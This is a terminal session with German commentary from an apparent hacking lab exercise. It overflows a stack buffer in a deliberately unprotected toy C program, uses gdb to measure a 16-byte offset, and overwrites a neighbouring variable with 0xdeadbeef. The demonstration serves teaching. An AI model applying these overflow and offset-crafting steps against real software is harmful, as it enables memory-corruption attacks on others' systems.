root@toshiba:/home/tomovic/hack# gcc -g -fno-stack-protector -z execstack -o overflow_example overflow_example.c
root@toshiba:/home/tomovic/hack# ./overflow_example $(perl -e 'print "A"x30')
[BEFORE] buffer_two is at 0xbffff6ec and contains 'two'
[BEFORE] buffer_one is at 0xbffff6f4 and contains 'one'
[BEFORE] value is at 0xbffff6fc and is 5 (0x00000005)
[STRCPY] copying 30 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff6ec and contains 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xbffff6f4 and contains 'AAAAAAAAAAAAAAAAAAAAAA'
[AFTER] value is at 0xbffff6fc and is 1094795585 (0x41414141)
root@toshiba:/home/tomovic/hack# gdb -q
(gdb) print 0xbffff6fc - 0xbffff6ec
$1 = 16
(gdb) quit
Das neue OS arbeitet anders, ebenso die Verwaltung der Variablen. Es kann auch sein, dass ihr in ein paar Jahren 12 Byte als Spielraum bekommt.
root@toshiba:/home/tomovic/hack# ./overflow_example $(perl -e 'print "A"x20 . "abcd"')
[BEFORE] buffer_two is at 0xbffff6ec and contains 'two'
[BEFORE] buffer_one is at 0xbffff6f4 and contains 'one'
[BEFORE] value is at 0xbffff6fc and is 5 (0x00000005)
[STRCPY] copying 24 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff6ec and contains 'AAAAAAAAAAAAAAAAAAAAabcd'
[AFTER] buffer_one is at 0xbffff6f4 and contains 'AAAAAAAAAAAAabcd'
[AFTER] value is at 0xbffff6fc and is 1094795585 (0x41414141)
20 ist falsch, der String ist zu lang: value liegt nur 16 Byte hinter buffer_two (siehe gdb: 0xbffff6fc - 0xbffff6ec = 16), also überschreiben bereits die 'A' value (0x41414141), und "abcd" landet erst dahinter.
root@toshiba:/home/tomovic/hack# ./overflow_example $(perl -e 'print "A"x16 . "abcd"')
[BEFORE] buffer_two is at 0xbffff6fc and contains 'two'
[BEFORE] buffer_one is at 0xbffff704 and contains 'one'
[BEFORE] value is at 0xbffff70c and is 5 (0x00000005)
[STRCPY] copying 20 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff6fc and contains 'AAAAAAAAAAAAAAAAabcd'
[AFTER] buffer_one is at 0xbffff704 and contains 'AAAAAAAAabcd'
[AFTER] value is at 0xbffff70c and is 1684234849 (0x64636261)
root@toshiba:/home/tomovic/hack# ./overflow_example $(perl -e 'print "A"x16 . "\xef\xbe\xad\xde"')
[BEFORE] buffer_two is at 0xbffff6fc and contains 'two'
[BEFORE] buffer_one is at 0xbffff704 and contains 'one'
[BEFORE] value is at 0xbffff70c and is 5 (0x00000005)
[STRCPY] copying 20 bytes into buffer_two
[AFTER] buffer_two is at 0xbffff6fc and contains 'AAAAAAAAAAAAAAAAᆳ '
[AFTER] buffer_one is at 0xbffff704 and contains 'AAAAAAAAᆳ '
[AFTER] value is at 0xbffff70c and is -559038737 (0xdeadbeef)
root@toshiba:/home/tomovic/hack#